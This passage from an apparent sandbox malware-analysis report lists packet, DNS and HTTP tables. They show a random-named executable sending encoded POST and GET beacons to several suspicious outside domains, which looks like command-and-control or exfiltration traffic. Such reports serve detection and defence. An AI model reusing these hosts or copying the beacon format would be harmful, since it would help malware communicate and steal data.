                                                Dec 13, 2024 11:41:04.931687117 CET8049931192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:06.378410101 CET8049931192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:06.378647089 CET8049931192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:06.378725052 CET4993180192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:06.381520033 CET4993180192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:06.501343966 CET8049931192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:12.128348112 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:12.249499083 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:12.249631882 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:12.277929068 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:12.399692059 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.564431906 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.564450026 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.564465046 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.564506054 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:13.564730883 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.564743996 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.564779043 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:13.564960957 CET8049947194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:13.565012932 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:13.779284954 CET4994780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:14.797914028 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:15.059552908 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:15.059840918 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:15.072442055 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:15.192159891 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337105036 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337188005 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337199926 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337239027 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:16.337482929 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337527037 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:16.337551117 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337682962 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337692976 CET8049957194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:16.337728977 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:16.576208115 CET4995780192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:17.595048904 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:17.714850903 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:17.714935064 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:17.729728937 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:17.850784063 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:17.850796938 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144171000 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144351006 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144390106 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144520044 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144556046 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144576073 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144609928 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:19.144654989 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:19.144826889 CET8049964194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:19.144901037 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:19.232501984 CET4996480192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.256475925 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.378798008 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:20.378922939 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.388465881 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:20.508384943 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662540913 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662626982 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662663937 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662740946 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.662889004 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662925005 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.662930965 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.662961006 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.663017035 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.663152933 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:21.663199902 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.666714907 CET4997080192.168.2.10194.9.94.86
                                                Dec 13, 2024 11:41:21.786432028 CET8049970194.9.94.86192.168.2.10
                                                Dec 13, 2024 11:41:27.260855913 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:27.381062031 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:27.381149054 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:27.393131971 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:27.513345957 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479172945 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479288101 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479298115 CET8049980199.59.243.227192.168.2.10
                                                Dec 13, 2024 11:41:28.479326963 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:28.479345083 CET4998080192.168.2.10199.59.243.227
                                                Dec 13, 2024 11:41:29.560451984 CET4998080192.168.2.10199.59.243.227

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 11:40:37.101191998 CET6550353192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:38.091720104 CET6550353192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:38.271616936 CET53655031.1.1.1192.168.2.10
                                                Dec 13, 2024 11:40:38.271632910 CET53655031.1.1.1192.168.2.10
                                                Dec 13, 2024 11:40:54.846268892 CET5329453192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:55.857359886 CET5329453192.168.2.101.1.1.1
                                                Dec 13, 2024 11:40:56.685698986 CET53532941.1.1.1192.168.2.10
                                                Dec 13, 2024 11:40:56.685811043 CET53532941.1.1.1192.168.2.10
                                                Dec 13, 2024 11:41:11.392446041 CET5510053192.168.2.101.1.1.1
                                                Dec 13, 2024 11:41:12.121771097 CET53551001.1.1.1192.168.2.10
                                                Dec 13, 2024 11:41:26.673376083 CET6122953192.168.2.101.1.1.1
                                                Dec 13, 2024 11:41:27.258270025 CET53612291.1.1.1192.168.2.10

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 13, 2024 11:40:37.101191998 CET192.168.2.101.1.1.10xd640Standard query (0)www.tabyscooterrentals.xyzA (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:40:38.091720104 CET192.168.2.101.1.1.10xd640Standard query (0)www.tabyscooterrentals.xyzA (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:40:54.846268892 CET192.168.2.101.1.1.10xfaf5Standard query (0)www.ftaane.netA (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:40:55.857359886 CET192.168.2.101.1.1.10xfaf5Standard query (0)www.ftaane.netA (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:41:11.392446041 CET192.168.2.101.1.1.10xff2dStandard query (0)www.milp.storeA (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:41:26.673376083 CET192.168.2.101.1.1.10xf704Standard query (0)www.vavada-official.buzzA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 13, 2024 11:40:38.271616936 CET1.1.1.1192.168.2.100xd640No error (0)www.tabyscooterrentals.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:38.271616936 CET1.1.1.1192.168.2.100xd640No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:38.271616936 CET1.1.1.1192.168.2.100xd640No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:40:38.271632910 CET1.1.1.1192.168.2.100xd640No error (0)www.tabyscooterrentals.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:38.271632910 CET1.1.1.1192.168.2.100xd640No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:38.271632910 CET1.1.1.1192.168.2.100xd640No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685698986 CET1.1.1.1192.168.2.100xfaf5No error (0)www.ftaane.netftaane.net.milaoshu.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685698986 CET1.1.1.1192.168.2.100xfaf5No error (0)ftaane.net.milaoshu.buyusdt.memilaoshu.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685698986 CET1.1.1.1192.168.2.100xfaf5No error (0)milaoshu.buyusdt.mex103.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685698986 CET1.1.1.1192.168.2.100xfaf5No error (0)x103.jieruitech.info192.197.113.112A (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685811043 CET1.1.1.1192.168.2.100xfaf5No error (0)www.ftaane.netftaane.net.milaoshu.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685811043 CET1.1.1.1192.168.2.100xfaf5No error (0)ftaane.net.milaoshu.buyusdt.memilaoshu.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685811043 CET1.1.1.1192.168.2.100xfaf5No error (0)milaoshu.buyusdt.mex103.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:40:56.685811043 CET1.1.1.1192.168.2.100xfaf5No error (0)x103.jieruitech.info192.197.113.112A (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:41:12.121771097 CET1.1.1.1192.168.2.100xff2dNo error (0)www.milp.store194.9.94.86A (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:41:12.121771097 CET1.1.1.1192.168.2.100xff2dNo error (0)www.milp.store194.9.94.85A (IP address)IN (0x0001)false
                                                Dec 13, 2024 11:41:27.258270025 CET1.1.1.1192.168.2.100xf704No error (0)www.vavada-official.buzz94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 13, 2024 11:41:27.258270025 CET1.1.1.1192.168.2.100xf704No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.tabyscooterrentals.xyz
                                                • www.ftaane.net
                                                • www.milp.store
                                                • www.vavada-official.buzz

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.104986785.159.66.93802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:40:38.409822941 CET392OUTGET /4wxo/?Hn=lLPdJfWx2zHd-riP&6hzlp=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npN1S+mAenC5poxe7lGbUmU2Ideml9w== HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Connection: close
                                                Host: www.tabyscooterrentals.xyz
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Dec 13, 2024 11:40:39.732321978 CET225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Fri, 13 Dec 2024 10:40:39 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-12-13T10:40:44.5161501Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.1049908192.197.113.112802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:40:56.830984116 CET633OUTPOST /8cvl/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 194
                                                Connection: close
                                                Host: www.ftaane.net
                                                Origin: http://www.ftaane.net
                                                Referer: http://www.ftaane.net/8cvl/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 32 78 64 4e 50 38 78 69 50 75 75 6d 6a 72 54 4f 56 39 75 31 38 31 55 45 32 4f 55 4b 39 2b 5a 6b 50 66 48 38 63 47 47 68 48 2b 45 47 2b 31 52 6a 68 39 57 59 56 73 71 6e 69 4e 33 70 41 58 6b 79 2b 69 46 65 2b 41 45 69 6f 35 69 58 4a 78 4b 54 46 76 72 6b 4c 4a 46 74 4f 4a 6a 36 4c 4d 75 73 46 69 4d 46 50 61 30 4e 50 5a 6a 4e 45 5a 78 52 61 48 2f 62 70 56 32 67 33 74 2b 6e 64 35 78 48 2f 53 71 45 35 35 4c 34 68 68 79 38 56 63 37 4b 4f 54 79 47 30 32 55 68 6e 62 57 77 69 5a 30 4d 72 6a 74 32 79 6d 67 72 2b 4f 33 6c 71 64 6e 50 52 4d 55 52 54 43 4a 74 6f 64 6c 46
                                                Data Ascii: 6hzlp=2xdNP8xiPuumjrTOV9u181UE2OUK9+ZkPfH8cGGhH+EG+1Rjh9WYVsqniN3pAXky+iFe+AEio5iXJxKTFvrkLJFtOJj6LMusFiMFPa0NPZjNEZxRaH/bpV2g3t+nd5xH/SqE55L4hhy8Vc7KOTyG02UhnbWwiZ0Mrjt2ymgr+O3lqdnPRMURTCJtodlF
                                                Dec 13, 2024 11:40:58.406092882 CET246INHTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:40:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.1049918192.197.113.112802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:40:59.495857000 CET657OUTPOST /8cvl/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 218
                                                Connection: close
                                                Host: www.ftaane.net
                                                Origin: http://www.ftaane.net
                                                Referer: http://www.ftaane.net/8cvl/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 32 78 64 4e 50 38 78 69 50 75 75 6d 69 50 76 4f 57 61 53 31 39 56 55 44 35 75 55 4b 7a 65 5a 67 50 66 4c 38 63 48 79 4c 48 4e 67 47 35 55 68 6a 67 2f 2b 59 53 73 71 6e 37 39 33 6f 66 48 6b 35 2b 69 34 6a 2b 41 49 69 6f 35 32 58 4a 30 75 54 46 2b 72 6e 4e 5a 46 76 62 5a 69 63 46 73 75 73 46 69 4d 46 50 62 56 57 50 64 50 4e 48 6f 42 52 62 6a 72 59 33 6c 32 2f 6e 39 2b 6e 58 5a 78 44 2f 53 72 52 35 34 6d 66 68 6e 32 38 56 64 4c 4b 41 68 61 46 2b 32 55 6e 71 37 58 44 6c 34 46 79 6b 52 42 65 79 67 38 67 76 2b 7a 6b 6b 63 61 49 41 64 31 47 41 31 56 6a 6d 62 51 76 72 70 38 73 4b 66 7a 4b 67 4b 59 77 72 6f 70 78 4e 6b 72 79 51 77 3d 3d
                                                Data Ascii: 6hzlp=2xdNP8xiPuumiPvOWaS19VUD5uUKzeZgPfL8cHyLHNgG5Uhjg/+YSsqn793ofHk5+i4j+AIio52XJ0uTF+rnNZFvbZicFsusFiMFPbVWPdPNHoBRbjrY3l2/n9+nXZxD/SrR54mfhn28VdLKAhaF+2Unq7XDl4FykRBeyg8gv+zkkcaIAd1GA1VjmbQvrp8sKfzKgKYwropxNkryQw==
                                                Dec 13, 2024 11:41:01.057383060 CET246INHTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:41:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.1049925192.197.113.112802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:02.152693987 CET1670OUTPOST /8cvl/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 1230
                                                Connection: close
                                                Host: www.ftaane.net
                                                Origin: http://www.ftaane.net
                                                Referer: http://www.ftaane.net/8cvl/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 32 78 64 4e 50 38 78 69 50 75 75 6d 69 50 76 4f 57 61 53 31 39 56 55 44 35 75 55 4b 7a 65 5a 67 50 66 4c 38 63 48 79 4c 48 4e 6f 47 35 69 56 6a 68 65 2b 59 54 73 71 6e 6b 4e 33 31 66 48 6b 6b 2b 69 51 6e 2b 41 30 49 6f 2f 36 58 50 69 69 54 56 61 33 6e 45 5a 46 76 5a 5a 69 49 4c 4d 75 39 46 6d 6f 42 50 62 6c 57 50 64 50 4e 48 72 70 52 64 33 2f 59 31 6c 32 67 33 74 2b 64 64 35 78 6e 2f 52 62 42 35 34 53 6c 67 58 57 38 56 39 62 4b 43 53 79 46 38 57 55 6c 6d 62 58 62 6c 34 4a 58 6b 52 4e 53 79 67 67 65 76 38 54 6b 6e 6f 50 6e 53 76 31 52 66 44 52 36 68 36 34 45 67 70 30 30 4e 62 4b 6f 74 70 77 62 70 4c 41 37 42 55 43 58 44 56 4f 38 30 39 51 69 6f 72 61 6f 63 69 57 34 78 6a 6c 73 65 71 6a 77 66 59 4a 73 4e 64 2b 72 57 70 51 53 70 4f 71 62 4e 67 59 67 43 34 79 5a 33 71 4a 73 47 79 46 33 78 32 42 58 49 5a 4e 38 42 6d 46 73 4c 33 61 66 69 75 70 35 64 45 6a 68 41 39 63 2f 38 41 78 70 72 77 64 37 38 37 56 61 73 67 70 4f 35 37 62 62 72 32 52 4c 41 70 7a 41 6f 67 52 5a 79 2f 53 43 71 38 62 77 [TRUNCATED]
                                                Data Ascii: 6hzlp=2xdNP8xiPuumiPvOWaS19VUD5uUKzeZgPfL8cHyLHNoG5iVjhe+YTsqnkN31fHkk+iQn+A0Io/6XPiiTVa3nEZFvZZiILMu9FmoBPblWPdPNHrpRd3/Y1l2g3t+dd5xn/RbB54SlgXW8V9bKCSyF8WUlmbXbl4JXkRNSyggev8TknoPnSv1RfDR6h64Egp00NbKotpwbpLA7BUCXDVO809QioraociW4xjlseqjwfYJsNd+rWpQSpOqbNgYgC4yZ3qJsGyF3x2BXIZN8BmFsL3afiup5dEjhA9c/8Axprwd787VasgpO57bbr2RLApzAogRZy/SCq8bwXSSws4V6nV2VxQZLRQA6wBNIUfhn77+Sw9oGXtTZ73kcsmrb7NK4RWLmShMhm0dKYYY4vBUcdLyNJa01/+t3Srq59Hc7q7DsA7ZOJCGcD1eqxaddvp+Sg3j9mMk2TqLpPRgVobCixqtSpxQohSBXF30O4LjIR55KEn0RvnAtYRJBEbyoiIp5ZWIogBA5AXNANpinoIaJuUPakeDeyqHGI0DemFyb/ykLEM6dn4UcsUY+QAzyUNQOV0q02AGkJaHM6OM2GRvam/FkflvEVLXidw/iQJc/ZG+1uEQKesEjspvQjc1O1v53WOtPTFzPBQ7gE8Ufk9QM/HQFqAsuUlCJzccazSZhJqdIpD8OProSre2fMDKujrXA9ig9EMhiZb3rt1/C6sf/neTptJDDj8kaaf4II3hBAAkm9f4br2hUtgVZXVqik/en/DGZwC3AF4/SxTaeOa16JvonoDTx3cAEp1uC8F2aMartm0uT1tbzmKH4zXQuFGCSRSIy+EZHS6a6cFLg4N8q5J68TIAGtKJ+RFQlpqWEl2WYNGnPteUZTyf6qNCONZ5i2Zd7l+HCdZaMChAVg5ly3KPDSmjaSEio36w6gn3ftV2IAeNyqnGHdX6tFJjGlmNqcj4Lc2mO9+2mHEuAZ4rr115hVFshhRsRjvjgLWwBY1I+ez [TRUNCATED]
                                                Dec 13, 2024 11:41:03.754610062 CET246INHTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:41:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.1049931192.197.113.112802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:04.809333086 CET380OUTGET /8cvl/?6hzlp=7z1tMIVVCeOFn4uxK5mz1jwV68wJ7YplGsn8T3mfCMtY7lZDnOfrQMvWs9v0B15OwhJf1ztMzreoSzqDQfzwDL0bb93UG8uYJWkhP+xaRe/kLZVaBg==&Hn=lLPdJfWx2zHd-riP HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Connection: close
                                                Host: www.ftaane.net
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Dec 13, 2024 11:41:06.378410101 CET246INHTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Fri, 13 Dec 2024 10:41:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                X-Powered-By: PHP/7.4.33
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.1049947194.9.94.86802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:12.277929068 CET633OUTPOST /2j93/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 194
                                                Connection: close
                                                Host: www.milp.store
                                                Origin: http://www.milp.store
                                                Referer: http://www.milp.store/2j93/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 75 65 4b 67 7a 69 77 32 49 6b 5a 36 2f 76 45 33 6c 57 2b 41 4f 74 35 47 6b 4c 64 35
                                                Data Ascii: 6hzlp=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBueKgziw2IkZ6/vE3lW+AOt5GkLd5
                                                Dec 13, 2024 11:41:13.564431906 CET1236INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
